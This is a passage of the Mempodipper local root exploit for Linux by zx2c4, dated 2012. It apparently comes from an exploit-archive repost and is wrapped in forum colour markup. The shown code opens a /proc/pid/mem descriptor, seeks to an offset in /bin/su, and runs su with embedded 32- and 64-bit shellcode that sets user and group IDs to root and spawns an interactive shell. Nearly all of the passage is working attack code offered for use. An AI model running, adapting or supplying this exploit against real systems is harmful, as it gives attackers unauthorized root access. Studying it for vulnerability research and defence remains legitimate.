if ([/COLOR][COLOR=#0000BB]fd [/COLOR][COLOR=#007700]< [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]) {
[/COLOR][COLOR=#0000BB]perror[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[-] recv_fd"[/COLOR][COLOR=#007700]);
return [/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700];
}
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Assigning fd %d to stderr.\n"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]dup2[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]2[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]15[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]dup2[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]2[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]unsigned long offset [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]address [/COLOR][COLOR=#007700]- [/COLOR][COLOR=#0000BB]su_padding[/COLOR][COLOR=#007700]();
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Seeking to offset 0x%lx.\n"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]offset[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]lseek64[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]fd[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]offset[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]SEEK_SET[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#FF8000]#if defined(__i386__)
// See shellcode-32.s in this package for the source.
[/COLOR][COLOR=#0000BB]char shellcode[/COLOR][COLOR=#007700][] =
[/COLOR][COLOR=#DD0000]"\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
"\x0f\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
"\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
"\x80"[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#FF8000]#elif defined(__x86_64__)
// See shellcode-64.s in this package for the source.
[/COLOR][COLOR=#0000BB]char shellcode[/COLOR][COLOR=#007700][] =
[/COLOR][COLOR=#DD0000]"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48"
"\x31\xf6\x40\xb7\x0f\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f"
"\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7"
"\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50"
"\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05"[/COLOR][COLOR=#007700];
[/COLOR][COLOR=#FF8000]#else
#error "That platform is not supported."
#endif
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Executing su with shellcode.\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]execl[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"/bin/su"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]"su"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]shellcode[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700]);
} else {
[/COLOR][COLOR=#0000BB]char sock[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]32[/COLOR][COLOR=#007700]];
[/COLOR][COLOR=#0000BB]sprintf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]sock[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]"%d"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]sockets[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]]);
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"[+] Executing child from child fork.\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]execl[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"/proc/self/exe"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]prog_name[/COLOR][COLOR=#007700], [/COLOR][COLOR=#DD0000]"-c"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]sock[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700]);
}
return [/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700];
}
[/COLOR][COLOR=#0000BB]int main[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]int argc[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]char [/COLOR][COLOR=#007700]**[/COLOR][COLOR=#0000BB]argv[/COLOR][COLOR=#007700])
{
[/COLOR][COLOR=#0000BB]prog_name [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]argv[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]];
if ([/COLOR][COLOR=#0000BB]argc [/COLOR][COLOR=#007700]> [/COLOR][COLOR=#0000BB]2 [/COLOR][COLOR=#007700]&& [/COLOR][COLOR=#0000BB]argv[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]] == [/COLOR][COLOR=#DD0000]'-' [/COLOR][COLOR=#007700]&& [/COLOR][COLOR=#0000BB]argv[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]] == [/COLOR][COLOR=#DD0000]'c'[/COLOR][COLOR=#007700])
return [/COLOR][COLOR=#0000BB]child[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]atoi[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]argv[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]2[/COLOR][COLOR=#007700]]));
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"===============================\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"= Mempodipper =\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"= by zx2c4 =\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"= Jan 21, 2012 =\n"[/COLOR][COLOR=#007700]);
[/COLOR][COLOR=#0000BB]printf[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"===============================\n\n"[/COLOR][COLOR=#007700]);
if ([/COLOR][COLOR=#0000BB]argc [/COLOR][COLOR=#007700]> [/COLOR][COLOR=#0000BB]2 [/COLOR][COLOR=#007700]&& [/COLOR][COLOR=#0000BB]argv[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]][[/COLOR][COLOR=#0000BB]0[/COLOR][COLOR=#007700]] == [/COLOR][COLOR=#DD0000]'-' [/COLOR][COLOR=#007700]&& [/COLOR][COLOR=#0000BB]argv[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]][[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]] == [/COLOR][COLOR=#DD0000]'o'[/COLOR][COLOR=#007700])
return [/COLOR][COLOR=#0000BB]parent[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]strtoul[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]argv[/COLOR][COLOR=#007700][[/COLOR][COLOR=#0000BB]2[/COLOR][COLOR=#007700]], [/COLOR][COLOR=#0000BB]NULL[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]16[/COLOR][COLOR=#007700]));
else
return [/COLOR][COLOR=#0000BB]parent[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]find_address[/COLOR][COLOR=#007700]());
}
[/COLOR][COLOR=#FF8000]# 1337day.com [2012-06-29] [/COLOR][/COLOR]
